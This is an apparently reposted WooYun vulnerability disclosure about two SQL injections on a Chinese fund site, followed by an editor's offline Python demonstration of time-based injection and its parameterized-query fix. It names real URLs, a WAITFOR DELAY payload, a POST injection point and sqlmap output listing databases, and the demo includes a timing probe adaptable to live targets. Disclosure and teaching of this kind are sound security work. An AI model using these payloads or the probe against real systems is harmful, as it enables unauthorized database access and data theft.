
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0109469

Title: Two MSSQL Server injections on the 展恒基金 main site

Vendor: 展恒基金

Author: 大懒

Submitted: 2015-04-21 18:08

Fixed: 2015-06-10 01:02

Published: 2015-06-10 01:02

Type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: confirmed by vendor

Source: http://www.wooyun.org. For questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2015-04-21: Details sent to the vendor, awaiting vendor handling
2015-04-26: Vendor confirmed; details visible to the vendor only
2015-05-06: Details opened to core white hats and domain experts
2015-05-16: Details opened to regular white hats
2015-05-26: Details opened to intern white hats
2015-06-10: Details opened to the public

Brief description:

Detailed description:

1.
URL: http://www.myfund.com/simu/fitem.aspx?code=*
Vulnerable parameter: code
Payload: ' WAITFOR DELAY '0:0:5'-- (time-based blind injection: appending this to code delays the response by 5 seconds)
2. POST injection
URL: http://www.myfund.com/fundselect/jijinjingli.aspx?managerid=*
POST parameters:
__VIEWSTATE=/wEPDwUKMTM3NTUzMzY4MA9kFgJmD2QWHmYPDxYCHgRUZXh0BQblvKDpkqtkZAIBDw8WAh8ABQUwLjAwJWRkAgIPDxYCHwAFBTAuMDAlZGQCAw8P[...]ZGRfawD9DB6njHnlyX4YK3EbiYhkVY4mlA1CFUpNsRhEUA%3d%3d
(The __VIEWSTATE value is the page's opaque ASP.NET view-state blob, several kilobytes long; only its beginning and end are reproduced here. It is only needed to make the postback valid; the injection point is managerid.)
Vulnerable parameter: managerid
Proof (sqlmap output):
current user: 'myfunduser'
available databases [24]
[*] bbbb
[*] db_datadown
[*] FinChinaData
[*] FundEvaluating
[*] hdesdb
[*] master
[*] MetaCRM
[*] MetaCRM5
[*] model
[*] msdb
[*] myfp
[*] myfpbbs
[*] MyfpData
[*] pgenius
[*] prim_temp
[*] PrimaryData
[*] PRIV_DB
[*] SBO-COMMON
[*] SBODemo_China
[*] SBODemo_SG
[*] SecondaryData
[*] Sifung_Cms_DB
[*] Sifung_Cms_DB1
[*] tempdb

Proof of vulnerability:

Other URLs that also take the code parameter:
1. http://www.myfund.com/ajaxhdl/funditem.ashx
2. http://www.myfund.com/fundselect/gonggaoxiangqing.aspx
3. http://www.myfund.com/fundselect/pingji.aspx
4. http://www.myfund.com/simu/fcompany.aspx
These should be checked as well.

Fix recommendations:

1. Filter and validate input
2. Extend the WAF rule set
3. Use parameterized queries instead of concatenating request parameters into SQL text
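Worked example, added by the editor and not part of the original report or of myfund.com's code: the script below shows what the WAITFOR DELAY payload from item 1 does to a string-concatenated query, the baseline-versus-payload timing probe a tester uses to confirm it, and the parameterized form recommended in fix item 3, against which the same payload is inert. The database is a constructed in-process stand-in for an MSSQL-backed .aspx handler so the script runs offline; the table name fund, the @code parameter and the benign value 000001 are assumptions, and only the code parameter and the payload come from the report.

```python
"""Time-based blind SQL injection: confirming a WAITFOR DELAY payload and
showing why parameter binding defeats it.

Added example; not code from the original report or from myfund.com. The
target is a constructed in-process stand-in for an MSSQL-backed .aspx page,
so everything here runs offline. Only the parameter name 'code' and the
payload string are taken from the report.
"""
import re
import statistics
import time

# --- constructed stand-in for the vulnerable page -------------------------

WAITFOR_RE = re.compile(r"WAITFOR\s+DELAY\s+'(\d+):(\d+):(\d+(?:\.\d+)?)'", re.I)


def strip_line_comments(sql: str) -> str:
    """T-SQL '--' comments out the rest of the line; this is how the payload
    discards the closing quote the original query template appends."""
    return "\n".join(line.split("--", 1)[0] for line in sql.splitlines())


def fake_mssql_execute(sql: str, params=None, scale: float = 1.0) -> list:
    """Simulated server: honours a WAITFOR DELAY found in the statement text,
    never anything inside bound parameters (they are data, not SQL), and
    otherwise returns no rows. `scale` shrinks the sleep for a quick demo."""
    m = WAITFOR_RE.search(strip_line_comments(sql))
    if m:
        hours, minutes, seconds = int(m.group(1)), int(m.group(2)), float(m.group(3))
        time.sleep((hours * 3600 + minutes * 60 + seconds) * scale)
    return []


def vulnerable_lookup(code: str, scale: float = 1.0) -> list:
    """String concatenation: the request parameter becomes SQL text.
    (Assumed table name 'fund'; the real schema is not in the report.)"""
    sql = "SELECT * FROM fund WHERE code = '" + code + "'"
    return fake_mssql_execute(sql, None, scale)


def hardened_lookup(code: str, scale: float = 1.0) -> list:
    """Parameterised: the SQL text is constant, the value travels separately."""
    sql = "SELECT * FROM fund WHERE code = @code"
    return fake_mssql_execute(sql, {"@code": code}, scale)


# --- the probe a tester runs to confirm the report's payload --------------

PAYLOAD = "' WAITFOR DELAY '0:0:5'--"  # from the report, appended to code=


def time_request(fn, value: str, scale: float) -> float:
    t0 = time.perf_counter()
    fn(value, scale)
    return time.perf_counter() - t0


def is_time_injectable(fn, benign: str = "000001", payload: str = PAYLOAD,
                       expected_delay: float = 5.0, samples: int = 3,
                       scale: float = 1.0) -> bool:
    """Compare median latency with and without the payload. Taking several
    samples and subtracting a baseline is what separates a genuine WAITFOR
    from network jitter or a slow backend."""
    base = statistics.median(time_request(fn, benign, scale) for _ in range(samples))
    hit = statistics.median(time_request(fn, benign + payload, scale) for _ in range(samples))
    return (hit - base) >= 0.8 * expected_delay * scale


if __name__ == "__main__":
    scale = 0.02  # the report's 5-second delay becomes 0.1 s here
    print("vulnerable endpoint injectable:", is_time_injectable(vulnerable_lookup, scale=scale))
    print("hardened endpoint injectable:  ", is_time_injectable(hardened_lookup, scale=scale))
```

Against a live target, replace the lookup function with one that performs the HTTP request (scale=1.0) and keep several samples per measurement; a single slow response proves nothing, a consistent delta close to the requested delay does. The hardened path sends the payload as a bound value, so the server never parses WAITFOR and the probe correctly reports it as not injectable.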

Copyright notice: credit the source when reposting: 大懒@乌云


Vulnerability response

Vendor response:

Severity: Low

Rank: 5

Confirmed: 2015-04-26 01:01

Vendor reply:

The recommendations have been passed to the project team. Thanks to 大懒 for the attention and the contribution.

Latest status:

None